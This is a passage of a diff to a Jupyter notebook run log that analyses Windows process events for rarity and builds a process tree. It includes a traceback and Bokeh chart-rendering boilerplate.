14:16:59.427  MSTICAlertsWin1       S-1-5-18  MSTICAlertsWin1$   \n4 2019-02-10 08:56:16.593  MSTICAlertsWin1       S-1-5-18  MSTICAlertsWin1$   \n\n  SubjectDomainName SubjectLogonId NewProcessId  ...    pathHash  \\\n0         WORKGROUP          0x3e7        0xd78  ...  4163782718   \n1         WORKGROUP          0x3e7        0x6f8  ...  4163782718   \n2         WORKGROUP          0x3e7        0xd68  ...  4163782718   \n3         WORKGROUP          0x3e7       0x16d4  ...  4163782718   \n4         WORKGROUP          0x3e7       0x1070  ...  4163782718   \n\n  commandlineLen commandlineLogLen commandlineTokensFull commandlineScore  \\\n0            119          2.075547                    18            10142   \n1            119          2.075547                    18            10142   \n2            119          2.075547                    18            10142   \n3            119          2.075547                    18            10142   \n4            119          2.075547                    18            10142   \n\n  commandlineTokensHash isSystemSession accountNum ClusterSize    Rarity  \n0            2764818190            True       2202         129  0.007752  \n1            2764818190            True       2202         129  0.007752  \n2            2764818190            True       2202         129  0.007752  \n3            2764818190            True       2202         129  0.007752  \n4            2764818190            True       2202         129  0.007752  \n\n[5 rows x 31 columns]"
+       },
+       "execution_count": 10,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "e27a3066-b20e-483c-b9c2-52c154f1a03c",
+     "text": "proc_rarity.head()"
+    },
+    "executionTime": "2019-12-13T22:45:57.379Z"
+   },
+   {
+    "cell": {
+     "executionCount": 11,
+     "executionEventId": "9cb35307-bca6-4a77-bf23-5487545bb18d",
+     "hasError": true,
+     "id": "ca79e527-dd67-49ee-a623-46e05389e884",
+     "outputs": [
+      {
+       "ename": "AttributeError",
+       "evalue": "'DataFrame' object has no attribute 'build_process_tree'",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+        "\u001b[1;31mAttributeError\u001b[0m                            Traceback (most recent call last)",
+        "\u001b[1;32m<ipython-input-11-2cb105870db9>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[1;32m----> 1\u001b[1;33m \u001b[0mp_tree_leg\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mproc_tree\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mbuild_process_tree\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mproc_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mshow_progress\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mTrue\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m",
+        "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\envs\\condadev\\lib\\site-packages\\pandas\\core\\generic.py\u001b[0m in \u001b[0;36m__getattr__\u001b[1;34m(self, name)\u001b[0m\n\u001b[0;32m   5177\u001b[0m             \u001b[1;32mif\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_info_axis\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_can_hold_identifiers_and_holds_name\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mname\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   5178\u001b[0m                 \u001b[1;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m[\u001b[0m\u001b[0mname\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 5179\u001b[1;33m             \u001b[1;32mreturn\u001b[0m \u001b[0mobject\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__getattribute__\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mname\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m   5180\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   5181\u001b[0m     \u001b[1;32mdef\u001b[0m \u001b[0m__setattr__\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mname\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mvalue\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;31mAttributeError\u001b[0m: 'DataFrame' object has no attribute 'build_process_tree'"
+       ]
+      }
+     ],
+     "persistentId": "1918edbe-6e6a-4d00-9c31-de7fed6f588b",
+     "text": "p_tree_leg = proc_tree.build_process_tree(proc_tree, show_progress=True)"
+    },
+    "executionTime": "2019-12-13T22:46:32.484Z"
+   },
+   {
+    "cell": {
+     "executionCount": 12,
+     "executionEventId": "2bb8c149-9ab9-4a74-8e3f-d9418c3c794f",
+     "hasError": false,
+     "id": "ca79e527-dd67-49ee-a623-46e05389e884",
+     "outputs": [
+      {
+       "data": {
+        "application/vnd.jupyter.widget-view+json": {
+         "model_id": "e5b6f666227b43cc8d6eeb4c60a5bf4d",
+         "version_major": 2,
+         "version_minor": 0
+        },
+        "text/plain": "HBox(children=(IntProgress(value=0, bar_style='info', description='Progress:'), Label(value='0%')))"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "name": "stdout",
+       "output_type": "stream",
+       "text": "{'Processes': 18, 'RootProcesses': 1, 'LeafProcesses': 16, 'BranchProcesses': 1, 'IsolatedProcesses': 0, 'LargestTreeDepth': 3}\n"
+      }
+     ],
+     "persistentId": "1918edbe-6e6a-4d00-9c31-de7fed6f588b",
+     "text": "p_tree_leg = ptree.build_process_tree(proc_tree, show_progress=True)"
+    },
+    "executionTime": "2019-12-13T22:46:56.345Z"
+   },
+   {
+    "cell": {
+     "executionCount": 13,
+     "executionEventId": "6e7e0871-6aa1-49ba-a285-4b2ed086d991",
+     "hasError": false,
+     "id": "1df6266c-6aca-4682-8041-584b890d8e70",
+     "outputs": [
+      {
+       "data": {
+        "text/html": "\n    <div class=\"bk-root\">\n        <a href=\"https://bokeh.pydata.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n        <span id=\"1001\">Loading BokehJS ...</span>\n    </div>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!output.data.hasOwnProperty(EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"1001\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error() {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (var i = 0; i < css_urls.length; i++) {\n      var url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    for (var i = 0; i < js_urls.length; i++) {\n      var url = js_urls[i];\n      var element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.async = false;\n      element.src = url;\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };var element = document.getElementById(\"1001\");\n  if (element == null) {\n    console.error(\"Bokeh: ERROR: autoload.js configured with elementid '1001' but no matching script tag was found. \")\n    return false;\n  }\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  var js_urls = [\"https://cdn.pydata.org/bokeh/release/bokeh-1.3.4.min.js\", \"https://cdn.pydata.org/bokeh/release/bokeh-widgets-1.3.4.min.js\", \"https://cdn.pydata.org/bokeh/release/bokeh-tables-1.3.4.min.js\", \"https://cdn.pydata.org/bokeh/release/bokeh-gl-1.3.4.min.js\"];\n  var css_urls = [];\n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    \n    function(Bokeh) {\n      \n    },\n    function(Bokeh) {} // ensure no trailing comma for IE\n  ];\n\n  function run_inline_js() {\n    \n    if ((root.Bokeh !== undefined) || (force === true)) {\n      for (var i = 0; i < inline_js.length; i++) {\n        inline_js[i].call(root, root.Bokeh);\n      }if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"1001\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+        "application/vnd.bokehjs_load.v0+json": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  \n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"1001\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error() {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (var i = 0; i < css_urls.length; i++) {\n      var url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    for (var i = 0; i < js_urls.length; i++) {\n      var url = js_urls[i];\n      var element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.async = false;\n      element.src = url;\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };var element = document.getElementById(\"1001\");\n  if (element == null) {\n    console.error(\"Bokeh: ERROR: autoload.js configured with elementid '1001' but no matching script tag was found. \")\n    return false;\n  }\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  var js_urls = [\"https://cdn.pydata.org/bokeh/release/bokeh-1.3.4.min.js\", \"https://cdn.pydata.org/bokeh/release/bokeh-widgets-1.3.4.min.js\", \"https://cdn.pydata.org/bokeh/release/bokeh-tables-1.3.4.min.js\", \"https://cdn.pydata.org/bokeh/release/bokeh-gl-1.3.4.min.js\"];\n  var css_urls = [];\n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    \n    function(Bokeh) {\n      \n    },\n    function(Bokeh) {} // ensure no trailing comma for IE\n  ];\n\n  function run_inline_js() {\n    \n    if ((root.Bokeh !== undefined) || (force === true)) {\n      for (var i = 0; i < inline_js.length; i++) {\n        inline_js[i].call(root, root.Bokeh);\n      }if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"1001\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "text/html": "\n\n\n\n\n\n  <div class=\"bk-root\" id=\"59d1e9f2-7c95-4e5b-bac3-d7d8b7489c99\" data-root-id=\"1124\"></div>\n"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"4eec22b6-251a-4358-b905-989e6c838545\":{\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"1123\",\"type\":\"Row\"},{\"id\":\"1121\",\"type\":\"DataTable\"}]},\"id\":\"1124\",\"type\":\"Column\"},{\"attributes\":{\"source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"}},\"id\":\"1103\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1136\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1090\",\"type\":\"HelpTool\"},{\"attributes\":{\"callback\":null,\"end\":6,\"start\":1},\"id\":\"1006\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"1137\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1138\",\"type\":\"StringEditor\"},{\"attributes\":{\"overlay\":{\"id\":\"1105\",\"type\":\"BoxAnnotation\"},\"x_range\":null,\"y_range\":{\"id\":\"1008\",\"type\":\"Range1d\"}},\"id\":\"1104\",\"type\":\"RangeTool\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":{\"id\":\"1104\",\"type\":\"RangeTool\"},\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1085\",\"type\":\"PanTool\"},{\"id\":\"1086\",\"type\":\"WheelZoomTool\"},{\"id\":\"1087\",\"type\":\"BoxZoomTool\"},{\"id\":\"1088\",\"type\":\"SaveTool\"},{\"id\":\"1089\",\"type\":\"ResetTool\"},{\"id\":\"1090\",\"type\":\"HelpTool\"},{\"id\":\"1104\",\"type\":\"RangeTool\"}]},\"id\":\"1091\",\"type\":\"Toolbar\"},{\"attributes\":{},\"id\":\"1139\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1140\",\"type\":\"StringEditor\"},{\"attributes\":{\"ticks\":[1,2,3]},\"id\":\"1062\",\"type\":\"FixedTicker\"},{\"attributes\":{\"grid_line_color\":null,\"ticker\":{\"id\":\"1076\",\"type\":\"BasicTicker\"}},\"id\":\"1079\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"1141\",\"type\":\"StringFormatter\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.2},\"fill_color\":{\"value\":\"navy\"},\"level\":\"overlay\",\"line_alpha\":{\"value\":1.0},\"line_color\":{\"value\":\"black\"},\"line_dash\":[2,2],\"line_width\":{\"value\":0.5}},\"id\":\"1105\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"editor\":{\"id\":\"1130\",\"type\":\"StringEditor\"},\"field\":\"TimeGenerated\",\"formatter\":{\"id\":\"1109\",\"type\":\"DateFormatter\"},\"title\":\"TimeGenerated\"},\"id\":\"1110\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1142\",\"type\":\"StringEditor\"},{\"attributes\":{\"editor\":{\"id\":\"1134\",\"type\":\"StringEditor\"},\"field\":\"SubjectUserSid\",\"formatter\":{\"id\":\"1133\",\"type\":\"StringFormatter\"},\"title\":\"SubjectUserSid\"},\"id\":\"1113\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1143\",\"type\":\"StringFormatter\"},{\"attributes\":{\"source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"}},\"id\":\"1061\",\"type\":\"CDSView\"},{\"attributes\":{\"format\":\"%F %T\"},\"id\":\"1109\",\"type\":\"DateFormatter\"},{\"attributes\":{},\"id\":\"1144\",\"type\":\"StringEditor\"},{\"attributes\":{\"editor\":{\"id\":\"1132\",\"type\":\"StringEditor\"},\"field\":\"SubjectUserName\",\"formatter\":{\"id\":\"1131\",\"type\":\"StringFormatter\"},\"title\":\"SubjectUserName\"},\"id\":\"1112\",\"type\":\"TableColumn\"},{\"attributes\":{\"columns\":[{\"id\":\"1110\",\"type\":\"TableColumn\"},{\"id\":\"1112\",\"type\":\"TableColumn\"},{\"id\":\"1113\",\"type\":\"TableColumn\"},{\"id\":\"1114\",\"type\":\"TableColumn\"},{\"id\":\"1115\",\"type\":\"TableColumn\"},{\"id\":\"1116\",\"type\":\"TableColumn\"},{\"id\":\"1117\",\"type\":\"TableColumn\"},{\"id\":\"1118\",\"type\":\"TableColumn\"},{\"id\":\"1119\",\"type\":\"TableColumn\"},{\"id\":\"1120\",\"type\":\"TableColumn\"}],\"height\":150,\"source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"},\"view\":{\"id\":\"1122\",\"type\":\"CDSView\"},\"width\":950},\"id\":\"1121\",\"type\":\"DataTable\"},{\"attributes\":{},\"id\":\"1145\",\"type\":\"StringFormatter\"},{\"attributes\":{\"data_source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"},\"glyph\":{\"id\":\"1058\",\"type\":\"Text\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1059\",\"type\":\"Text\"},\"selection_glyph\":null,\"view\":{\"id\":\"1061\",\"type\":\"CDSView\"}},\"id\":\"1060\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"1146\",\"type\":\"StringEditor\"},{\"attributes\":{\"range\":null,\"value\":-0.5},\"id\":\"1098\",\"type\":\"Dodge\"},{\"attributes\":{\"editor\":{\"id\":\"1136\",\"type\":\"StringEditor\"},\"field\":\"SubjectLogonId\",\"formatter\":{\"id\":\"1135\",\"type\":\"StringFormatter\"},\"title\":\"SubjectLogonId\"},\"id\":\"1114\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1147\",\"type\":\"StringFormatter\"},{\"attributes\":{\"text\":{\"field\":\"PID\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1055\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1056\",\"type\":\"Dodge\"}}},\"id\":\"1059\",\"type\":\"Text\"},{\"attributes\":{\"below\":[{\"id\":\"1014\",\"type\":\"LinearAxis\"}],\"center\":[{\"id\":\"1018\",\"type\":\"Grid\"},{\"id\":\"1023\",\"type\":\"Grid\"}],\"left\":[{\"id\":\"1019\",\"type\":\"LinearAxis\"}],\"outline_line_color\":{\"value\":null},\"plot_height\":700,\"plot_width\":900,\"renderers\":[{\"id\":\"1039\",\"type\":\"GlyphRenderer\"},{\"id\":\"1046\",\"type\":\"GlyphRenderer\"},{\"id\":\"1053\",\"type\":\"GlyphRenderer\"},{\"id\":\"1060\",\"type\":\"GlyphRenderer\"}],\"title\":{\"id\":\"1004\",\"type\":\"Title\"},\"toolbar\":{\"id\":\"1028\",\"type\":\"Toolbar\"},\"toolbar_location\":\"above\",\"x_range\":{\"id\":\"1006\",\"type\":\"Range1d\"},\"x_scale\":{\"id\":\"1010\",\"type\":\"LinearScale\"},\"y_range\":{\"id\":\"1008\",\"type\":\"Range1d\"},\"y_scale\":{\"id\":\"1012\",\"type\":\"LinearScale\"}},\"id\":\"1003\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"editor\":{\"id\":\"1138\",\"type\":\"StringEditor\"},\"field\":\"NewProcessId\",\"formatter\":{\"id\":\"1137\",\"type\":\"StringFormatter\"},\"title\":\"NewProcessId\"},\"id\":\"1115\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1148\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1151\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1140\",\"type\":\"StringEditor\"},\"field\":\"NewProcessName\",\"formatter\":{\"id\":\"1139\",\"type\":\"StringFormatter\"},\"title\":\"NewProcessName\"},\"id\":\"1116\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1154\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{},\"id\":\"1149\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"formatter\":{\"id\":\"1154\",\"type\":\"BasicTickFormatter\"},\"ticker\":{\"id\":\"1076\",\"type\":\"BasicTicker\"},\"visible\":false},\"id\":\"1075\",\"type\":\"LinearAxis\"},{\"attributes\":{\"editor\":{\"id\":\"1142\",\"type\":\"StringEditor\"},\"field\":\"CommandLine\",\"formatter\":{\"id\":\"1141\",\"type\":\"StringFormatter\"},\"title\":\"CommandLine\"},\"id\":\"1117\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1073\",\"type\":\"LinearScale\"},{\"attributes\":{\"editor\":{\"id\":\"1144\",\"type\":\"StringEditor\"},\"field\":\"ProcessId\",\"formatter\":{\"id\":\"1143\",\"type\":\"StringFormatter\"},\"title\":\"ProcessId\"},\"id\":\"1118\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1020\",\"type\":\"BasicTicker\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\"